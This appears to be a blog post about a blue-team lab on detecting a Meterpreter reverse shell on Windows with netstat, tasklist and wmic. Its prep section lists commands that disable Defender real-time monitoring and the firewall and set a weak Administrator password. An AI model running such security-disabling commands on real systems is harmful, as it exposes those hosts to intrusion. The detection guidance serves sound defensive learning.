WindowsCLI mini-Detection Lab - Malware Analysis from Defender’s Eyes

By: Venkata Naveen Kumar Prabhuleti

Program: Master’s in Cybersecurity Analytics & Operations, Penn State University

LinkedIn: linkedin.com/in/naveen-kumar-9b55a0154

Why this Lab?

This lab focuses not on exploitation, but detection and analysis of a reverse shell malware attack on a Windows system using pure CLI tools like netstat, tasklist, and wmic.

The goal is to equip defenders with real-world techniques to detect Meterpreter sessions without relying on AV or EDR tools.

Lab Setup

• Attacker: Kali Linux with Metasploit
• Target: Windows machine with PowerShell access
• Tools Used: netstat, tasklist, wmic, meterpreter, msfconsole

Phase 1: Prepping the Target

Before simulating the attack:

Set-MpPreference -DisableRealtimeMonitoring $true
netsh advfirewall set allprofiles state off
net user Administrator password1234
ipconfig        

Phase 2: Launch the Reverse Shell

From Kali Linux:

Phase 3: Analyze from the Windows CLI

Step 1: List All Active Connections

netstat -naob        

Look for suspicious ESTABLISHED connections (e.g., port 4444).

Step 2: Map the PID to Process

netstat -f
tasklist /m /fi "pid eq 1476"        

See the DLL modules loaded by suspicious processes like powershell.exe.

Understanding the DLL Modules in a Malicious PowerShell Process

In the screenshot below, we observe a PowerShell process (powershell.exe) with PID 1476, and several associated dynamic link libraries (DLLs) loaded into its memory space:

These DLLs - such as ntdll.dll, wow64.dll, wow64base.dll, wow64win.dll, wow64con.dll, and wow64cpu.dll - are core components of the Windows operating system and are not inherently malicious.

❗ Does every malicious payload load these exact DLLs?

No. Malware often injects into legitimate processes or loads additional, custom libraries during execution.

However, this set of DLLs represents the minimum runtime environment required for a PowerShell-based process to:

• Interface with system calls (ntdll.dll)
• Run in a 32-bit environment on a 64-bit OS (wow64*.dll)
• Enable command execution and establish network connections

Key Insight for Analysts

The presence of these modules alone does not confirm malicious activity. But when seen in conjunction with:

• Unusual parent processes (e.g., launched from cmd.exe)
• Suspicious network activity (e.g., connection to external IP on port 4444)
• Base64-encoded or obfuscated payloads

…it significantly strengthens the case for malicious PowerShell execution.

This analysis underscores why defenders must correlate multiple indicators - network, process lineage, command-line history, and loaded modules - to detect stealthy threats that evade traditional AV.

Step 3: Deep Dive with WMIC

wmic process where processid=1476 get commandline
wmic process get name,parentprocessid,processid | select-string 1476        

This reveals how the malware was invoked via cmd.exe and confirms reverse shell behavior.

Key Defender Insights

1. Monitor outbound connections on uncommon ports like 4444
2. PowerShell spawning with large Base64 blobs = red flag
3. Parent-child process tracing reveals stealthy attacks
4. wmic, tasklist, and netstat provide high-fidelity telemetry

Download the Full Lab

Download the full lab document (Setup is just with 2 VMs)

GitHub: Windows_Backdoor_Analysis_Lab.zip

Let’s Talk Blue Team!

This hands-on is great for:

SOC/IR folks refining detection simple workflows

Students exploring malware behaviors

Blue Teams building endpoint playbooks

DM me if you want help running this live or need more advanced scenarios (registry persistence, encoded stagers, etc.)